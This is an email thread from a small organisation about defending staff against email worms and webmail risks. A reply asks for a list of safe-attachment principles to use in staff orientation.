Re: Email sanitizing - requesting advice

[Kathie Brosemer <kathie@cleannorth.org>]

I like your suggestion of a combination of approaches to the problem.  I
could add virus ed 101 to the general orientation we give new employees
and volunteers at the office, which is already quite extensive with the
procedures for phone, the website, etc.

What I would need is a set of generally-accepted principles, e.g. "Don't
open any .exe files unless you are certain of whom they came from and
what they contain,"  or alternatively "Never open a .exe file before
checking with technical support or running XYZ virus scanning software
on it ..." or whatever.

With a list of such principles, updated regularly, I would take on the
education side.  As you know, I cannot generate that list (I was the one
who ran brain.exe from this system two months ago, remember?).  :)




Dan Brosemer wrote:
> 
> We've had an email filter running for 10 days on all @cleannorth.org
> addresses which catches such evils as email worms, trojans, and web bugs and
> disables them.  It also forces our virus scanner to run over all executable
> attachments before it lets you run them.  All in all, a good tool to have
> when you have a bunch of Windows machines that want to read email.
> 
> It also lets me know whenever someone sends something that is an obvious
> attack (but it doesn't send me the content of the message, just in case it
> wasn't -- I don't want to know if your aunt loves you, but I _do_ want to
> know if she's sending you the ILOVEYOU worm).
> 
> In the past 10 days, we've received (and neutralized) the Hybris worm twice.
> This thing is quite insidious.  An excellent technical description is here:
> http://www.f-secure.com/v-descs/hybris.shtml
> 
> This could be be spread by web mail too.  And that's where my question
> comes in:
> 
> We only have four active users of the @cleannorth.org mail (even though
> everyone with a network account has an @cleannorth.org address).  Everyone
> else uses web mail, and...
> 
> I can't sanitize web mail, but I'm unwilling to just block webmail sites
> (Actually, I'm pretty much unwilling to block _any_ sites), so I'm wondering
> what we should do?
> 
> If I remove active content through a proxy filter, a lot of stupid, but
> useful, sites will be unusable (whether they were usable before or not is
> left to your own opinion).
> 
> The spread of Melissa showed quite conslusively that user education is all
> but useless, and the spread of the Anna Kornukova worm demonstrated that
> getting burned by Melissa didn't stop and make very many people think before
> being part of the next big email dissaster.
> 
> So what's left?
> 
> And if we do settle on user education being the best we can do, how do we go
> about it?  I'm no educator.  The best I could probably do is beat the users
> with a stick until they promise not to open email attachments or use the two
> most easily exploited email systems (Hotmail and Yahoo) where no matter how
> hard you try, unless you go and manually inspect the code of each and every
> web page, you _can't_ use them securely.  (mail.com recently fixed this bug,
> that's why they're not on the list).
> 
> Anyone with education experience care to help out?
> 
> Any technical suggestions?
> 
> Any comments about how possible technical measures might impact usability?
> 
> Right now, I'm leaning to a _little_ of each.  I'll try to find a way to
> remove the <DEFANGED_LAYER> tag (which only Netscape supports) by proxy filtering.
> That won't get rid of malicious javascript, but I think there's little we
> can do there.  On top of that, we need a bit of user education about running
> untrusted attachments.
> 
> The former I can do, but is there anyone willing to do user education?
> 
> And, someone, please come up with something better than this!
> 
> Don, Dee, Kathie, Dave, Jim, I'd appreciate your input especially.
> 
> Thanks
> -Dan
> 
> --
> "There are two limits that this standard places on the number of
> characters in a line. Each line of characters MUST be no more than
> 998 characters, and SHOULD be no more than 78 characters, excluding
> the CRLF."       -- rfc2822 - Internet Message Format

-- 
I am always doing what I cannot do yet, in order to learn how to 
do it.                         - Vincent Van Gogh